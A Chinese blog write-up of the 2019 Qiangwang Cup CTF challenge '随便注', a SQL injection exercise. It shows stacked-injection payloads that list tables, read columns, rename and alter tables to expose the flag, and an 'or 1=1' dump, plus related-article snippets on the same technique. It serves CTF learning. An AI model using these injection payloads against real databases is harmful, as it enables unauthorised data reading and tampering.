[强网杯 2019] 随便注 1

最新推荐文章于 2024-06-27 18:00:14 发布
最新推荐文章于 2024-06-27 18:00:14 发布
阅读量141 收藏
点赞数
分类专栏: 极客大挑战 文章标签: 服务器 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anyhowanywhere/article/details/127057870
版权

[强网杯 2019]随便注 1

1.我们打开网页以后是这样的
在这里插入图片描述
2.跟进页面推出考察的应该是依赖注入
随便输点内容走走看
在这里插入图片描述

先看一下有那些表

1'; show tables;#

在这里插入图片描述
我们发现有两张表

走你

0'; show columns from `words`;#
0'; show columns from `1919810931114514`;#

在这里插入图片描述

在这里插入图片描述
发现flag 在这个表里

到这就没思路 看大佬写的思路试了一下发现可以
思路是把1919810931114514表改名为words表,把属性名flag改为id,然后用1’ or 1=1;# 显示flag出来
在这之前当然要先把words表改名为其他

1';rename table `words` to words2; 
rename table `1919810931114514` to `words`;
 alter table words change flag id varchar(100);
  show tables; 
  show columns from words;# 
————————————————
版权声明:本文为CSDN博主「wow小华」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/weixin_45642610/article/details/112337143

最后上我们的 万金油

1' or 1=1;#

哈哈哈拿到结果
在这里插入图片描述

小*-^-*九
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便.docx
12-18
强网杯
【BUUCTF】强网杯 2019随便1 write up
GZWZ_的博客
04-06 4788
回显flag有好几种方法,但我只会一种┭┮﹏┭┮,如果有大佬会其他的,可不可以call我呢
[强网杯 2019]随便
m0_56691564的博客
11-30 2635
该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是释都不行,因此这个题使用堆叠入。由show的作用可知,words表内就两个字段,一个叫id,一个叫data。
[强网杯 2019]随便 1
tomatoff的博客
03-14 2814
1、登录页面: 2、直接提交1: 3、提交1’: 4、提交1": 5、由输入为1’时报错,所以猜测结果语句应该为单引号闭合; 所以提交a’ or ‘1’=‘1,获得: 6、后面不太会了,参考了大佬的文章: [强网杯2019]随便(初学者看过来) 7、先学习下再补充自己的理解 ...
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
【BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 3952
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
BUUCTF [强网杯 2019]随便 1(两种方法)
m0_62879498的博客
03-05 1万+
[强网杯 2019]随便 1 第一步,先判断入点的传参方式,发现是get传参。 第二步,判断闭合方式: 1’and 1=1-- q 1’and 1=2-- q 说明闭合方式为 单引号 如果输入1“and 1=1-- q 和1”and 1=2-- q 两次的回显结果一样,说明闭合方式不是 双引号 其他同理 第三步,判断是否有关键字过滤: 先直接输入: select 查看回显,发现: 发现本题过滤关键字:/select|update|delete|drop|insert|where|\.而且不区分
[强网杯 2019]随便1
kindyyy的博客
09-05 237
这里的意思大概是:这个默认查询word表的内容,没有办法看flag所在的表的字段,所以要将word所在的表名改为word,将word改为其他的表,即可默认查询flag。原理很简单,mysql_multi_query() 支持多条Sql语句同时执行,就是个;分隔,成堆的执行sql语句。在这里我学到了一个新的入方法,堆叠入,顾名思义,就是将语句堆叠在一起进行查询。其实直觉就觉得大概在1919810931114514里面有,让我们打开看一下。新知识:堆叠入遇到有数字时要用那个反引号包裹起来。
buuctf web题解之[强网杯 2019]随便1详解
2301_77451464的博客
01-29 1008
目录一、用到的知识点二、堆叠入的原理1.先看是字符型还是数字型2.查看入点3.接下来就是查看闭合方式4.再测试字段数,二分法,一点一点试,最后测试出来为25、联合查询,发现select|update|delete|drop|insert|where包括大小写等操作被过滤6.先通过show databases爆出数据库7.然后用 show tables 爆表8.可以看到这里有两个表,我们先尝试爆words表的内容9.爆1919810931114514数据表字段(意数据表为数字的时候需要用反引号括起来)1
buuctf 强网杯 2019 随便1
m0_63883187的博客
01-13 95
buuctf赛题日常解题
强网杯 WriteUp By Nu1L
08-02
2022年第六届“强网杯”全国网络安全挑战赛
2019 第三届强网杯线上赛.zip
12-17
强网杯
强网杯2022 pwn 赛题解析.docx
12-18
强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
2024.6.24 IDEA中文乱码问题(服务器 控制台 TOMcat)实测已解决
m0_73804764的博客
06-24 426
如果文件的编码方式与IDEA设置的编码方式不一致,就会产生乱码。确保文件和IDEA使用相同的编码,通常是UTF-8。如果你在终端或控制台看到乱码,可能是终端的编码设置问题。确保终端使用的是支持你的文件的编码方式。检查IDEA的全局编码设置和项目编码设置是否正确。设置完之后记得点击右下角的。设置完之后记得点击右下角的。设置完之后记得点击右下角的。
HP服务器基于SNMP-ilo4的硬件监控指标解读
MXsoft618的博客
06-24 450
监控易是一款功能全面的IT基础设施监控软件,它通过SNMP协议与HP服务器内置的ilo4远程管理卡进行通信,实现对HP服务器硬件状态的实时监控。本文将针对监控易中基于SNMP-ilo4的HP服务器硬件监控指标进行解读,帮助运维团队更好地理解和应用这些监控功能。通过SNMP-ilo4接口,监控易可以实时获取服务器的各项硬件状态信息,为运维团队提供全面的监控数据。通过监控易对HP服务器基于SNMP-ilo4的硬件监控指标进行解读,我们可以看到监控易为运维团队提供了全面而细致的服务器硬件监控解决方案。
主机服务器被入侵怎么办
qq177803623的博客
06-26 392
快卫士主机安全软件采用先进的监控预警技术,能够实时监控主机的运行状态和安全状况。引入快卫士主机安全软件,将为您的主机安全提供坚实的保障。它不仅能够有效预防主机被入侵的风险,还能在入侵发生时迅速应对,确保主机安全无虞。快卫士主机安全软件提供简洁直观的管理界面和丰富的管理功能,方便管理员进行日常的安全管理和维护。快卫士主机安全软件凭借其强大的防御能力、智能的监控预警功能和便捷的管理操作,是主机安全的不错选择。它具备强大的防御能力、智能的监控预警功能和便捷的管理操作,能够全方位守护您的主机安全。
Http接口RestSharp中StatusCode返回0, 但服务器或本地postman获取应答正常(C#)
最新发布
TivonaLH的博客
06-27 205
应该是我的本机启用了TLS1.2支持,而服务器上没有启用TLS1.2的支持,所以出现同样的代码本机没问题,而服务器上没法使用。返回值是空,statuscode 值是0。
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小*-^-*九

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值